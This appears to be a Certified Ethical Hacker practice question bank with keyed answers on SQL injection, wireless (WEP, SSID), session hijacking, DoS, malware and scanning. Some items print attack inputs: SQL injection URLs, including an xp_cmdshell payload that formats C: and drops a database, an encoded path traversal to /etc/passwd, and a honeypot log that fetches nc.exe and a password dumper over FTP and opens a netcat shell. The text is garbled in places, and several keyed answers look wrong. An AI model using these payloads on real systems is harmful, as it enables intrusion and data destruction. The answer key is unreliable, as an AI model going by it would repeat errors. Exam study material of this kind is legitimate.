CEH: Test 8
Exhibit: Picture: (Test 8 #50) Microsofe ODE DProve for ODBC Drive prove 00400e141 [Microsoft][ODBC SQL Server Driver][Undisclosed quotation mark before the character string",",/orderinclude_rsa.asp.line 4 You are conducting pen-test against a company's website using SQL Injection techniques. You enter "anuthing or 1=1-" in the username filed of an authentication form. This is the output returned from the server. What is the next step you should do? A. Identify the user context of the web application by running_ http://www.example.com/order/inclde_rsa_asp?pressReleaseID=5 ANDUSER_NAME() = 'dbo' B. Identify the database and table name by running:http://www.example.com/order/include_rsa.asp?pressReleaseID=5 ANDascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERExtype='U'),1))) > 109 C. Format the C: drive and delete the database by running:http://www.example.com/order/include_rsa.asp?pressReleaseID=5 ANDxp_cmdshell 'format c: /q /yes '; drop database myDB; D.Reboot the web server by running:http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset-reboot';
A. Identify the user context of the web application by running_ http://www.example.com/order/inclde_rsa_asp?pressReleaseID=5 ANDUSER_NAME() = 'dbo'
You visit a website to retrieve the listing of a company's staff members. But you can not find it on the website. You know the listing was certainly present one year before. How can you retrieve information from the outdated website? a. Through Archive.org b. Through Google searching cached files c. Visit customers' and partners' websites d. Download the website and crawl it
a. Through Archive.org
You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three way handshake. The server has just received packet #120 from the client. The client has a receive window of 200 and the server has a receive window of 250. Within what range of sequence numbers should a packet, sent by the client fall in order to be accepted by the server? a. 121-371 b. 120-370 c. 200-250 d. 121-231 e. 120-321
a. 121-371
Which of the following wireless technologies can be detected by NetStumbler? (Select all that apply) a. 802.11g b. 802.11b c. 802.11 d. 802.11e e. 802.11a
a. 802.11g b. 802.11b e. 802.11a
Jane has just accessed her preferred e-commerce web site and she has seen an item she would like to buy. Jane considers the price a bit too steep; she looks at the page source code and decides to save the page locally to modify some of the page variables. In the context of web application security, what do you think Jane has changed? a. A 'hidden' form field value b. A page cannot be changed locally; it can only be served by a web server c. A 'hidden' price value d. An integer variable
a. A 'hidden' form field value
What would best be defined as a security test on services against a known vulnerability database using an automated tool? a. A vulnerability assessment b. A penetration test c. A privacy review d. A server audit
a. A vulnerability assessment
Which of the following statements best describes the term Vulnerability? a. A weakness or error that can lead to a compromise b. The loss potential of a threat. c. An action or event that might prejudice security d. An agent that has the potential to take advantage of a weakness
a. A weakness or error that can lead to a compromise
Which of the following is NOT a valid NetWare access level? a. Administrator b. Not Logged in c. Logged in d. Console Access
a. Administrator
ook at the following SQL query. SELECT * FROM product WHERE PCategory='computers' or 1=1--' What will it return? Select the best answer. a. All computers and everything else b. Everything except computers c. All computers and all 1's d. All computers
a. All computers and everything else
Jim is having no luck performing a penetration test in XYZ's network. He is running the tests from home and has downloaded every security scanner that he could lay his hands on. Despite knowing the IP range of all the systems, and the exact network configuration, Jim is unable to get any useful results. Why is Jim having these problems? a. All of the answers apply. b. Security scanners are not designed to do testing through a firewall. c. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities. d. Security scanners cannot perform vulnerability linkage.
a. All of the answers apply.
Which of the following buffer overflow exploits are related to Microsoft IIS web server? (Choose three) a. Code Red Worm b. Indexing services ISAPI extension buffer overflow c. NeXT buffer overflow d. Internet Printing Protocol (IPP) buffer overflow
a. Code Red Worm b. Indexing services ISAPI extension buffer overflow d. Internet Printing Protocol (IPP) buffer overflow
Bob reads an article about how insecure wireless networks can be. He gets approval from his management to implement a policy of not allowing any wireless devices on the network. What other steps does Bob have to take in order to successfully implement this? (Select 2 answer.) a. Continuously survey the area for wireless devices. b. Disable all wireless protocols at the firewall. c. Train users in the new policy. d. Disable SNMP on the network so that wireless devices cannot be configured.
a. Continuously survey the area for wireless devices. c. Train users in the new policy.
Take a look at the following attack on a Web Server using obstructed URL: http://www.example.com/script.ext?template%2e%2e%2e%2e%2e%2f%2e%2f%65%74%63%2f %70%61%73%73%77%64 The request is made up of: %2e%2e%2f%2e%2e%2f%2e%2f% = ../../../ %65%74%63 = etc %2f = / %70%61%73%73%77%64 = passwd How would you protect information systems from these attacks? a. Create rules in IDS to alert on strange Unicode requests. b. Use SSL authentication on Web Servers. c. Enable Active Scripts Detection at the firewall and routers. d. Configure Web Server to deny requests involving Unicode characters.
a. Create rules in IDS to alert on strange Unicode requests.
On a default installation of Microsoft IIS web server, under which privilege does the web server software execute? a. Guest b. System c. Everyone d. Administrator
b. System
Kevin sends an email invite to Chris to visit a forum for security professionals. Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack? a. Cross Site Scripting b. Phishing c. Denial of Service d. Backdoor installation
a. Cross Site Scripting
____________ will let you assume a users identity at a dynamically generated web page or site. a. Cross site scripting b. Injection attack c. Winzapper d. SQL attack e. The shell attack
a. Cross site scripting
Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit. Choose the attack type from the choices given below. a. Database Fingerprinting b. Database Enumeration c. SQL Fingerprinting d. SQL Enumeration
a. Database Fingerprinting
Kevin has been asked to write a short program to gather user input for a web application. He likes to keep his code neat and simple. He chooses to use printf(str) where he should have ideally used printf(?s? str). What attack will his program expose the web application to? a. Format String Attack b. Cross Site Scripting c. Unicode Traversal Attack d. SQL injection Attack
a. Format String Attack
Peter is a Network Admin. He is concerned that his network is vulnerable to a smurf attack. What should Peter do to prevent a smurf attack? Select the best answer. a. Make sure his router won't take a directed broadcast b. Turn off fragmentation on his router c. Make sure all anti-virus protection is updated on all systems d. Disable multicast on the router e. He should disable unicast on all routers
a. Make sure his router won't take a directed broadcast
Which are true statements concerning the BugBear and Pretty Park worms? Select the best answers. a. Pretty Park tries to connect to an IRC server to send your personal passwords. b. Pretty Park propagates via network shares and email c. Both programs use email to do their work. d. BugBear propagates via network shares and email e. Pretty Park can terminate anti-virus applications that might be running to bypass them.
a. Pretty Park tries to connect to an IRC server to send your personal passwords. c. Both programs use email to do their work. d. BugBear propagates via network shares and email
Your boss Tess King is attempting to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. What would you call such an attack? a. SQL Injection attack b. SQL Select attack c. SQL Input attack d. SQL Piggybacking attack
a. SQL Injection attack
Which is the right sequence of packets sent during the initial TCP three way handshake? a. SYN,SYN-ACK,ACK b. SYN,ACK,SYN-ACK c. SYN,URG,ACK d. FIN,FIN-ACK,ACK
a. SYN,SYN-ACK,ACK
What type of cookies can be generated while visiting different web sites on the Internet? a. Session and permanent cookies. b. Permanent and long term cookies. c. Cookies are all the same,there is no such thing as different type of cookies. d. Session and external cookies.
a. Session and permanent cookies.
What do you call a system where users need to remember only one username and password, and be authenticated for multiple services? a. Single Sign-on b. Unique Sign-on c. Digital Certificate d. Simple Sign-on
a. Single Sign-on
While probing an organization you discover that they have a wireless network. From your attempts to connect to the WLAN you determine that they have deployed MAC filtering by using ACL on the access points. What would be the easiest way to circumvent and communicate on the WLAN? a. Sniff traffic if the WLAN and spoof your MAC address to one that you captured. b. Attempt to brute force the access point and update or delete the MAC ACL. c. Steel a client computer and use it to access the wireless network. d. Attempt to crack the WEP key using Airsnort.
a. Sniff traffic if the WLAN and spoof your MAC address to one that you captured.
Sally is a network admin for a small company. She was asked to install wireless accesspoints in the building. In looking at the specifications for the access-points, she sees that all of them offer WEP. Which of these are true about WEP? Select the best answer. a. Stands for Wired Equivalent Privacy b. Stands for Wireless Encryption Protocol c. It offers end to end security d. It makes a WLAN as secure as a LAN
a. Stands for Wired Equivalent Privacy
Virus Scrubbers and other malware detection program can only detect items that they are aware of. Which of the following tools would allow you to detect unauthorized changes or modifications of binary files on your system by unknown malware? a. System integrity verification tools b. A properly configured gateway c. There is no way of finding out until a new updated signature file is released d. Anti-Virus Software
a. System integrity verification tools
On wireless networks, SSID is used to identify the network. Why are SSID not considered to be a good security mechanism to protect a wireless networks? a. The SSID is transmitted in clear text. b. The SSID is only 32 bits in length. c. The SSID is to identify a station,not a network. d. The SSID is the same as the MAC address for all vendors.
a. The SSID is transmitted in clear text.
Which of the following is NOT a reason 802.11 WEP encryption is vulnerable? a. The standard does not provide for centralized key management b. The 24 bit Initialization Vector (IV) field is too small c. Automated tools like AirSnort are available to discover WEP keys d. There is no mutual authentication between wireless clients and access points
a. The standard does not provide for centralized key management
Bryan notices the error on the web page and asks Liza to enter liza' or '1'='1 in the email field. They are greeted with a message "Your login information has been mailed to [email protected]". What do you think has occurred? a. The web application returned the first record it found b. The web application picked up a record at random c. The server error has caused the application to malfunction d. The web application emailed the administrator about the error
a. The web application returned the first record it found
You wish to determine the operating system and type of web server being used. At the same time you wish to arouse no suspicion within the target organization. While some of the methods listed below work, which holds the least risk of detection? a. Use the netcraft web site look for the target organization's web site. b. Telnet to the web server and issue commands to illicit a response. c. Use nmap in paranoid mode and scan the web server. d. Make some phone calls and attempt to retrieve the information using social engineering.
a. Use the netcraft web site look for the target organization's web site.
Liza has forgotten her password to an online bookstore. The web application asks her to key in her email so that they can send her the password. Liza enters her email [email protected]'. The application displays server error. What is wrong with the web application? a. User input is not sanitized b. The ISP connection is not reliable c. The web server may be down d. The email is not valid
a. User input is not sanitized
In an attempt to secure his wireless network, Bob implements a VPN to cover the wireless communications. Immediately after the implementation, users begin complaining about how slow the wireless network is. After benchmarking the network's speed. Bob discovers that throughput has dropped by almost half even though the number of users has remained the same. Why does this happen in the VPN over wireless implementation? a. Using a VPN with wireless doubles the overhead on an access point for all direct client to access point communications. b. The stronger encryption used by the VPN slows down the network. c. VPNs use larger packets then wireless networks normally do. d. Using a VPN on wireless automatically enables WEP,which causes additional overhead.
a. Using a VPN with wireless doubles the overhead on an access point for all direct client to access point communications.
Scanning for services is an easy job for Bob as there are so many tools available from the Internet. In order for him to check the vulnerability of XYZ, he went through a few scanners that are currently available. Here are the scanners that he uses: 1. Axent's NetRecon (http://www.axent.com) 2. SARA, by Advanced Research Organization (http://www-arc.com/sara) 3. VLAD the Scanner, by Razor (http://razor.bindview.com/tools/) However, there are many other alternative ways to make sure that the services that have been scanned will be more accurate and detailed for Bob. What would be the best method to accurately identify the services running on a victim host? a. Using the manual method of telnet to each of the open ports ofXYZ. b. Using the default port and OS to make a best guess of what services are running on each port forXYZ. c. Using Cheops-ng to identify the devices ofXYZ. d. Using a vulnerability scanner to try to probe each port to verify or figure out which service is running forXYZ.
a. Using the manual method of telnet to each of the open ports ofXYZ.
Windump is the windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows platform you must install a packet capture library. What is the name of this library? a. WinPCAP b. LibPCAP c. PCAP d. NTPCAP
a. WinPCAP
Bubba has just accessed he preferred ecommerce web site and has spotted an item that he would like to buy. Bubba considers the price a bit too steep. He looks at the source code of the webpage and decides to save the page locally, so that he can modify the page variables. In the context of web application security, what do you think Bubba has changes? a. An integer variable. b. A hidden form field value. c. A hidden price value. d. A page cannot be changed locally,as it is served by a web server.
b. A hidden form field value.
What are the main drawbacks for anti-virus software? a. AV software can detect viruses but can take no action. b. AV software is signature driven so new exploits are not detected. c. AV software is difficult to keep up to the current revisions. d. It's relatively easy for an attacker to change the anatomy of an attack to bypass AV systems e. AV software is very machine (hardware) dependent. f. AV software isn't available on all major operating systems platforms.
b. AV software is signature driven so new exploits are not detected.
Jacob would like your advice on using a wireless hacking tool that can save him time and get him better results with lesser packets. You would like to recommend a tool that uses KoreK's implementation. Which tool would you recommend from the list below? a. John the Ripper b. Aircrack c. Shmoo d. Kismet
b. Aircrack
Access control is often implemented through the use of MAC address filtering on wireless Access Points. Why is this considered to be a very limited security measure? a. The MAC address is not a real random number. b. The MAC address is broadcasted and can be captured by a sniffer. c. Vendors MAC address assignment is published on the Internet. d. The MAC address is used properly only on Macintosh computers.
b. The MAC address is broadcasted and can be captured by a sniffer.
In an attempt to secure his wireless network, Bob turns off broadcasting of the SSI~ He concludes that since his access points require the client computer to have the proper SSID, it would prevent others from connecting to the wireless network. Unfortunately unauthorized users are still able to connect to the wireless network. Why do you think this is possible? a. The SSID is still sent inside both client and AP packets. b. All access points are shipped with a default SSI c. Bob forgot to turn off DHCP. d. Bob's solution only works in ad-hoc mode.
b. All access points are shipped with a default SSI
RC4 is known to be a good stream generator. RC4 is used within the WEP standard on wireless LAN. WEP is known to be insecure even if we are using a stream cipher that is known to be secured. What is the most likely cause behind this? a. The IV range is too small. b. All of the answers apply c. There are some flaws in the implementation. d. None of the answers apply. e. There is no key management.
b. All of the answers apply
A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database? a. An attacker submits user input that executes an operating system command to compromise a target system b. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database c. An attacker utilizes an incorrect configuration that leads to access with higher-than-expected privilege of the database d. An attacker gains control of system to flood the target system with requests, preventing legitimate users from gaining access
b. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database
Which of the following is most effective against passwords? Select the Answer: a. Dictionary Attack b. BruteForce attack c. Targeted Attack d. Manual password Attack
b. BruteForce attack
What is Form Scalpel used for? a. Analysis of Access Database Forms b. Dissecting HTML Forms c. Troubleshooting Netscape Navigator d. Dissecting SQL Forms e. Quatro Pro Analysis Tool
b. Dissecting HTML Forms
Which of the following is true of the wireless Service Set ID (SSID)? (Select all that apply.) a. Should be left at the factory default setting b. Identifies the wireless network c. Acts as a password for network access d. Not broadcasting the SSID defeats NetStumbler and other wireless discovery tools
b. Identifies the wireless network c. Acts as a password for network access
Which of the following is one of the key features found in a worm but not seen in a virus? a. All of them cannot be detected by virus scanners. b. It is self replicating without need for user intervention. c. The payload is very small,usually below 800 bytes. d. It does not have the ability to propagate on its own.
b. It is self replicating without need for user intervention.
Melissa is a virus that attacks Microsoft Windows platforms. To which category does this virus belong? a. System b. Macro c. Boot Sector infector d. Polymorphic
b. Macro
Sandra is conducting a penetration test for XYZ.com. She knows that XYZ.com is using wireless networking for some of the offices in the building right down the street. Through social engineering she discovers that they are using 802.11g. Sandra knows that 802.11g uses the same 2.4GHz frequency range as 802.11b. Using NetStumbler and her 802.11b wireless NIC, Sandra drives over to the building to map the wireless networks. However, even though she repositions herself around the building several times, Sandra is not able to detect a single AP. What do you think is the reason behind this? a. You can only pick up 802.11g signals with 802.11a wireless cards. b. Netstumbler does not work against 802.11g. c. Sandra must be doing something wrong,as there is no reason for her to not see the signals. d. The access points probably have disabled broadcasting of the SSID so they cannot be detected. e. The access points probably have WEP enabled so they cannot be detected. f. 802.11g uses OFDM while 802.11b uses DSSS so despite the same frequency and 802.11b card cannot see an 802.11g signal.
b. Netstumbler does not work against 802.11g.
Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive obtain from the client before commencing his test? a. IP Range,OS,and patches installed. b. Nothing but corporate name. c. Only the IP address range. d. All that is available from the client site.
b. Nothing but corporate name.
When a malicious hacker identifies a target and wants to eventually compromise this target, what would be among the first steps that he would perform? (Choose the best answer) a. Gain access to the remote computer in order to conceal the venue of attacks. b. Perform a reconnaissance of the remote target for identical of venue of attacks. c. Cover his tracks by eradicating the log files and audit trails. d. Always begin with a scan in order to quickly identify venue of attacks.
b. Perform a reconnaissance of the remote target for identical of venue of attacks.
Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs. What is this attack most appropriately called? a. Spoof attack b. Replay attack c. Rebound attack d. Injection attack
b. Replay attack
In order to attack a wireless network, you put up an access point and override the signal of the real access point. As users send authentication data, you are able to capture it. What kind of attack is this? a. WEP attack b. Rouge access point attack c. Unauthorized access point attack d. War Chalking
b. Rouge access point attack
Which of the following attacks takes best advantage of an existing authenticated connection? a. Spoofing b. Session Hijacking c. Password Guessing d. Password Sniffing
b. Session Hijacking
Eve decides to get her hands dirty and tries out a Denial of Service attack that is relatively new to her. his time she envisages using a different kind of method to attack Brownies Inc. Eve tries to forge the packets and uses the broadcast address. She launches an attack similar to that of fraggle. What is the technique that Eve used in the case above? a. SYN Flood b. Smurf c. Ping of Death d. Bubonic
b. Smurf
If you receive a RST packet while doing an ACK scan, it indicates that the port is open.(True/False). a. False b. True
b. True
Derek has stumbled upon a wireless network and wants to assess its security. However, he does not find enough traffic for a good capture. He intends to use AirSnort on the captured traffic to crack the WEP key and does not know the IP address range or the AP. How can he generate traffic on the network so that he can capture enough packets to crack the WEP key? a. Derek can use KisMAC as it needs two USB devices to generate traffic b. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic c. Derek can use a session replay on the packets captured d. Use any ARP requests found in the capture
b. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic
You work as security technician at XYZ.com. While doing web application testing, you might be required to look through multiple web pages online which can take a long time. Which of the processes listed below would be a more efficient way of doing this type of validation? a. Use mget to download all pages locally for further inspection. b. Use wget to download all pages locally for further inspection. c. Use get() to download all pages locally for further inspection. d. Use get* to download all pages locally for further inspection.
b. Use wget to download all pages locally for further inspection.
How would you prevent session hijacking attacks? a. Using non-Internet protocols like http secures sessions against hijacking b. Using unpredictable sequence numbers secures sessions against hijacking c. Using hardware-based authentication secures sessions against hijacking d. Using biometrics access tokens secures sessions against hijacking
b. Using unpredictable sequence numbers secures sessions against hijacking
WEP is used on 802.11 networks, what was it designed for? a. WEP is designed to provide a wireless local area network (WLAN) with a level of availability and privacy comparable to what is usually expected of a wired LAN. b. WEP is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what it usually expected of a wired LAN. c. WEOP is designed to provide a wireless local area network (WLAN) with a level of privacy comparable to what it usually expected of a wired LAN. d. WEP is designed to provide strong encryption to a wireless local area network (WLAN) with a lever of integrity and privacy adequate for sensible but unclassified information.
b. WEP is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what it usually expected of a wired LAN.
Say that "abigcompany.com" had a security vulnerability in the javascript on their website in the past. They recently fixed the security vulnerability, but it had been there for many months. Is there some way to 4go back and see the code for that error? Select the best answer. a. There is no way to get the changed webpage unless you contact someone at the company b. archive.org c. Javascript would not be in their html so a service like usenet or archive wouldn't help you d. Usenet
b. archive.org
One of the better features of NetWare is the use of packet signature that includes cryptographic signatures. The packet signature mechanism has four levels from 0 to 3. In the list below which of the choices represent the level that forces NetWare to sign all packets? a. 2 b. 0 (zero) c. 3 d. 1
c. 3
Which is the Novell Netware Packet signature level used to sign all packets ? a. 2 b. 1 c. 3 d. 0
c. 3
When working with Windows systems, what is the RID of the true administrator account? a. 1024 b. 1001 c. 500 d. 512 e. 1000 f. 501
c. 500
If you send a SYN to an open port, what is the correct response?(Choose all correct answers.) a. FIN b. PSH c. ACK d. SYN
c. ACK d. SYN
Why do you need to capture five to ten million packets in order to crack WEP with AirSnort? a. All IVs are vulnerable to attack b. Air Snort uses a cache of packets c. Air Snort implements the FMS attack and only encrypted packets are counted d. A majority of weak IVs transmitted by access points and wireless cards are not filtered by contemporary wireless manufacturers
c. Air Snort implements the FMS attack and only encrypted packets are counted
Which of the following is the best way an attacker can passively learn about technologies used in an organization? _____ a. By webcrawling the organization web site b. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization c. By sending web bugs to key personnel d. By performing a port scan on the organization's web site
c. By sending web bugs to key personnel
This kind of attack will let you assume a users identity at a dynamically generated web page or site: a. Session Hijacking b. Zone Transfer c. Cross Site Scripting d. SQL Injection
c. Cross Site Scripting
Joe Hacker is going wardriving. He is going to use PrismStumbler and wants it to go to a GPS mapping software application. What is the recommended and well-known GPS mapping package that would interface with PrismStumbler? Select the best answer. a. GPSMap b. Microsoft Mappoint c. GPSDrive d. WinPcap
c. GPSDrive
You have just received an assignment for an assessment at a company site. Company's management is concerned about external threat and wants to take appropriate steps to insure security is in place. Anyway the management is also worried about possible threats coming from inside the site, specifically from employees belonging to different Departments. What kind of assessment will you be performing ? a. Black box testing b. White box testing c. Gray box testing d. Black hat testing e. White hat testing f. Gray hat testing
c. Gray box testing
You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 Server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permission. You need to know what your current privileges are within the shell. Which of the following options would be your current privileges? a. Administrator b. IUSR_COMPUTERNAME c. Whatever account IIS was installed with d. LOCAL_SYSTEM
d. LOCAL_SYSTEM
Henry is an attacker and wants to gain control of a system and use it to flood a target system with requests, so as to prevent legitimate users from gaining access. What type of attack is Henry using? a. Henry is executing commands or viewing data outside the intended target path b. Henry is taking advantage of an incorrect configuration that leads to access with higher-than expected privilege c. Henry is using a denial of service attack which is a valid threat used by an attacker d. Henry uses poorly designed input validation routines to create or alter commands to gain access to unintended data or execute commands
c. Henry is using a denial of service attack which is a valid threat used by an attacker
What is Hunt used for? a. Hunt is used to hack web servers b. Hunt is used to footprint networks c. Hunt is used to intercept traffic i.e. man-in-the-middle traffic d. Hunt is used to sniff traffic e. Hunt is used for password cracking
c. Hunt is used to intercept traffic i.e. man-in-the-middle traffic
This packet was taken from a packet sniffer that monitors a Web server. Picture: (Test 8 #30) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-730.gif This packet was originally 1514 bytes long, but only the first 512 bytes are shown here. This is the standard hexdump representation of a network packet, before being decoded. A hexdump has three columns: the offset of each line, the hexadecimal data, and the ASCII equivalent. This packet contains a 14-byte Ethernet header, a 20-byte IP header, a 20-byte TCP header, an HTTP header ending in two line-feeds (0D 0A 0D 0A) and then the data. By examining the packet identify the name and version of the Web server? a. Apache 1.2 b. IIS 5.0 c. IIS 4.0 d. Linux WServer 2.3
c. IIS 4.0
What is the best means of prevention against viruses? a. Remove any external devices such as floppy and USB connectors. b. Install a rootkit detection tool. c. Install and update anti-virus scanner. d. Assign read only permission to all files on your system.
c. Install and update anti-virus scanner.
Bob is a very security conscious computer user. He plans to test a site that is known to have malicious applets, code, and more. Bob always make use of a basic Web Browser to perform such testing. Which of the following web browser can adequately fill this purpose? a. Mozila b. Internet Explorer c. Lynx d. Tiger
c. Lynx
The Slammer Worm exploits a stack-based overflow that occurs in a DLL implementing the Resolution Service. Which of the following Database Server was targeted by the slammer worm? a. MySQL b. Sybase c. MSSQL d. Oracle e. DB2
c. MSSQL
A Buffer Overflow attack involves: a. Flooding the target network buffers with data traffic to reduce the bandwidth available to legitimate users b. Using a trojan program to direct data traffic to the target host's memory stack c. Poorly written software that allows an attacker to execute arbitrary code on a target system d. Using a dictionary to crack password buffers by guessing user names and passwords
c. Poorly written software that allows an attacker to execute arbitrary code on a target system
What are the differences between SSL and S-HTTP? a. SSL operates at the application layer and S-HTTP operates at the network layer b. SSL operates at the network layer and S-HTTP operates at the application layer c. SSL operates at the transport layer and S-HTTP operates at the application layer d. SSL operates at the application layer and S-HTTP operates at the transport layer
c. SSL operates at the transport layer and S-HTTP operates at the application layer
Tess King is making use of Digest Authentication for her Web site. Why is this considered to be more secure than Basic authentication? a. The password sent in clear text over the network is never reused. b. Basic authentication is broken c. The password is never sent in clear text over the network d. It is based on Kerberos authentication protocol
c. The password is never sent in clear text over the network
What is the key advantage of Session Hijacking? a. You can successfully predict the sequence number generation. b. It can be easily done and does not require sophisticated skills. c. You can take advantage of an authenticated connection. d. You cannot be traced in case the hijack is detected.
c. You can take advantage of an authenticated connection.
What does black box testing mean? a. You have partial knowledge of the environment b. You have full knowledge of the environment c. You have no knowledge of the environment
c. You have no knowledge of the environment
Jackson discovers that the wireless AP transmits 128 bytes of plaintext, and the station responds by encrypting the plaintext. It then transmits the resulting ciphertext using the same key and cipher that are used by WEP to encrypt subsequent network traffic. What authentication mechanism is being followed here? a. single key authentication b. no authentication c. shared key authentication d. open system authentication
c. shared key authentication
When working with Windows systems, what is the RID of the true administrator account? a. 1001 b. 512 c. 1000 d. 500 e. 1024 f. 501
d. 500
You have been called to investigate a sudden increase in network traffic at XYZ. It seems that the traffic generated was too heavy that normal business functions could no longer be rendered to external employees and clients. After a quick investigation, you find that the computer has services running attached to TFN2k and Trinoo software. What do you think was the most likely cause behind this sudden increase in traffic? a. A network card that was jabbering. b. A bad route on the firewall. c. Invalid rules entry at the gateway. d. A distributed denial of service attack.
d. A distributed denial of service attack.
Bart is looking for a Windows NT/2000/XP command-line tool that can be used to assign, display, or modify ACL's (access control lists) to files or folders and also one that can be used within batch files. Which of the following tools can be used for that purpose? (Choose the best answer) a. PERM.exe b. NTPERM.exe c. CLACS.exe d. CACLS.exe
d. CACLS.exe
_________ ensures that the enforcement of organizational security policy does not rely on voluntary web application user compliance. It secures information by assigning sensitivity labels on information and comparing this to the level of security a user is operating at. a. Role-based Access Control b. Discretionary Access Control c. Authorized Access Control d. Mandatory Access Control
d. Mandatory Access Control
Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below. Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ; After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ; What attack is being depicted here? a. Cookie Stealing b. Cross Site Scripting c. Session Hijacking d. Parameter Manipulation
d. Parameter Manipulation
What are the three phases involved in security testing? a. Reconnaissance, Conduct,Report b. Preparation, Conduct,Billing c. Reconnaissance, Scanning,Conclusion d. Preparation, Conduct,Conclusion
d. Preparation,Conduct,Conclusion
If you perform a port scan with a TCP ACK packet, what should an OPEN port return? a. SYN/ACK b. FIN c. No Reply d. RST
d. RST
In order to attack a wireless network, you put up an access point and override the signal of the real access point. As users send authentication data, you are able to capture it. What kind of attack is this? a. WEP attack b. Unauthorized access point attack c. Drive by hacking d. Rogue access point attack
d. Rogue access point attack
Clive has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply packets that are being received on the external gateway interface. Further inspection reveals that they are not responses from the internal hosts' requests but simply responses coming from the Internet. What could be the most likely cause? a. Someone has spoofed Clive's IP address while doing a DoS attack. b. Someone has spoofed Clive's IP address while doing a land attack. c. Someone has spoofed Clive's IP address while doing a fraggle attack. d. Someone has spoofed Clive's IP address while doing a smurf attack.
d. Someone has spoofed Clive's IP address while doing a smurf attack.
Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn an interactive shell and plans to deface the main web page. He first attempts to use the "echo" command to simply overwrite index.html and remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tries to overwrite it with another page in which also he remains unsuccessful. What is the probable cause of Bill's problem? a. The system is a honeypot b. There is a problem with the shell and he needs to run the attack again c. You cannot use a buffer overflow to deface a web page d. The HTML file has permissions of read only
d. The HTML file has permissions of read only
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CM~EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below: Picture: (Test 8 #57) *cmd1.exe /c open 213.116.251.162>ftpcom* *cmd1.exe /c echo johna2k >>ftpcom* *cmd1.exe /c echo haxedj00 >>ftpcom* *cmd1.exe /c echo get nc.exe >>ftpcom* *cmd1.exe /c echo get pdump.exe >>ftpcom* *cmd1.exe /c echo samdump.dll >>ftpcom* *cmd1.exe /c echo quit >>ftpcom* *cmd1.exe /c ftp - s:ftpcom" *cmd1.exe / nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given? a. It is a local exploit where the attacker logs in using username johna2k. b. There are two attackers on the system - johna2k and haxedj00. c. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port. d. The attack is a remote exploit and the hacker downloads three files.
d. The attack is a remote exploit and the hacker downloads three files.
John is using tokens for the purpose of strong authentication. He is not confident that his security is considerably strong. In the context of Session hijacking why would you consider this as a false sense of security? a. A token is not considered strong authentication. b. The token based security cannot be easily defeated. c. Token security is not widely used in the industry. d. The connection can be taken over after authentication.
d. The connection can be taken over after authentication.
You are gathering competitive intelligence on XYZ.com. You notice that they have jobs listed on a few Internet job-hunting sites. There are two job postings for network and system administrators. How can this help you in footprint the organization? _____ a. An understanding of the number of employees in the company b. The IP range used by the target network c. How strong the corporate security policy is d. The types of operating systems and applications being used.
d. The types of operating systems and applications being used.
In an attempt to secure his 802.11b wireless network, Ulf decides to use a strategic antenna positioning. He places the antenna for the access points near the center of the building. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the building's center. There is a large parking lot and outlying filed surrounding the building that extends out half a mile around the building. Ulf figures that with this and his placement of antennas, his wireless network will be safe from attack. Which of the following statements is true? a. Ulf's network will be safe but only of he doesn't switch to 802.11a. b. With the 300 feet limit of a wireless signal,Ulf's network is safe. c. Wireless signals can be detected from miles away,Ulf's network is not safe. d. Ulf's network will not be safe until he also enables WEP.
d. Ulf's network will not be safe until he also enables WEP.
What is the name of the software tool used to crack a single account on Netware Servers using a dictionary attack? a. GetCrack b. CrackNov c. NovCrack d. NPWCrack e. NWPCrack
e. NWPCrack
Pandora is used to attack __________ network operating systems. a. UNIX b. Linux c. MAC OS d. Windows e. Netware
e. Netware
